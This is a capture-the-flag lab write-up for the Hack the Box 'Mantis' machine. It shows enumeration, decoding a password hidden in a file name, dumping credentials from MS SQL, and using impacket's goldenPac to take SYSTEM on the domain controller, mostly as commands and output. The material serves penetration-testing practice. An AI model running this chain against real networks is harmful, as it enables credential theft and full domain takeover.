Today we are going to solve another CTF challenge “Mantis” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of Penetration testing. Let start and learn how to analyze any vulnerability in a network then exploit it for retrieving desired information.
Level: Intermediate
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Mantis is 10.10.10.52 so let’s initiate with nmap port enumeration.
root@kali# nmap -sC -sV -oA nmap 10.10.10.52 # Nmap 7.70 scan initiated Tue May 7 13:08:49 2019 as: nmap -sC -sV -oA nmap 10.10.10.52 Nmap scan report for 10.10.10.52 Host is up (0.032s latency). Not shown: 980 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-07 17:09:18Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: MANTIS | DNS_Domain_Name: htb.local | DNS_Computer_Name: mantis.htb.local | DNS_Tree_Name: htb.local |_ Product_Version: 6.1.7601 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2019-05-05T21:17:25 |_Not valid after: 2049-05-05T21:17:25 |_ssl-date: 2019-05-07T17:10:12+00:00; +2s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Microsoft-IIS/7.5 |_http-title: Tossed Salad - Blog 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49167/tcp open msrpc Microsoft Windows RPC Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 48m02s, deviation: 1h47m21s, median: 1s | ms-sql-info: | 10.10.10.52:1433: | Version: | name: Microsoft SQL Server 2014 RTM | number: 12.00.2000.00 | Product: Microsoft SQL Server 2014 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb-os-discovery: | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: mantis | NetBIOS computer name: MANTIS\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: mantis.htb.local |_ System time: 2019-05-07T13:10:15-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2019-05-07 13:10:12 |_ start_date: 2019-05-05 17:15:54 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue May 7 13:11:40 2019 -- 1 IP address (1 host up) scanned in 170.33 seconds
From the given below image, you can observe we found so many ports are open in the victim’s network.
First of all, we browse target IP through port 1337 in our web browser and saw following the image of IIS7 and although here I didn’t get any clue for next step therefore automatically next I move for directory buster.
Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on //10.10.10.52:1337
root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337 -o gobuster-mantis.log ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.10.52:1337/ [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== 2019/05/08 06:22:22 Starting gobuster ===================================================== /secure_notes (Status: 301)
As result, I found a directory /secure notes
Here I saw two files dev_notes and web.config among these I’m interested in dev_notes test file to let’s open it.
When I open a dev_notes text file I read following contents as shown in below image and realize that it points towards a database “orcharddb” have “admin” as username, now I only need to know the required password for login into the database.
To me, the file “/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt” was looking suspicious as “NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx” was base 64 encoded, therefore, I need to decode this text for the correct assumption of getting the password.
root@kali:~/htb/mantis# curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt 1. Download OrchardCMS 2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database 3. Launch IIS and add new website and point to Orchard CMS folder location. 4. Launch browser and navigate to http://localhost:8080 5. Set admin password and configure sQL server connection string. 6. Add blog pages with admin user. Credentials stored in secure format OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001 SQL Server sa credentials file namez
dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt contains some base64-encoded text.
root@kali:~/htb/mantis# echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d 6d2424716c5f53405f504073735730726421
This looks like a hex string. Let’s convert it to ASCII:
root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -p m$$ql_S@_P@ssW0rd!
After decoding the above hex text finally I found a password for admin user.
Using mssqlclient.py we are going to connect to ms SQL server . Now let login into the database using database name and above-found credential via port 1433
root@kali:~/htb/mantis# ./mssqlclient.py htb.local/admin@10.10.10.52 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies Password: m$$ql_S@_P@ssW0rd! [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (120 7208) [!] Press help for extra shell commands SQL> select @@version Microsoft SQL Server 2014 - 12.0.2000.8 (X64) Feb 20 2014 20:04:26 Copyright (c) Microsoft Corporation Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor) SQL> SELECT name FROM master..sysdatabases master tempdb model msdb orcharddb SQL> use orcharddb [*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb [*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'. SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord ' Id UserName Email NormalizedUserName Password PasswordFormat HashAlgorithm PasswordSalt RegistrationStatus EmailStatus EmailChallengeToken CreatedUtc LastLoginUtc LastLogoutUtc SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== James J@m3s_P@ssW0rd! SQL>
We had manually added target IP with htb.local and matis.htb.local the domain names which we have found through nmap in our local host file.
Then we have installed impacket from git hub as given below command.
git clone https://github.com/CoreSecurity/impacket.git
Impacket contains goldenpac python file which is used for post exploitation, now execute given below command and access the victim’s terminal.
root@kali:~/htb/mantis# goldenPac.py htb.local/james@mantis.htb.local Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies Password: J@m3s_P@ssW0rd! [*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103 [*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657 [*] Attacking domain controller mantis.htb.local [*] mantis.htb.local found vulnerable! [*] Requesting shares on mantis.htb.local..... [*] Found writable share ADMIN$ [*] Uploading file wGWklYmG.exe [*] Opening SVCManager on mantis.htb.local..... [*] Creating service AgUh on mantis.htb.local..... [*] Starting service AgUh..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system c:\Users\james\Desktop>type user.txt 8a8*****54d c:\Users\Administrator\Desktop>type root.txt 209*****567
Author: Puckiestyle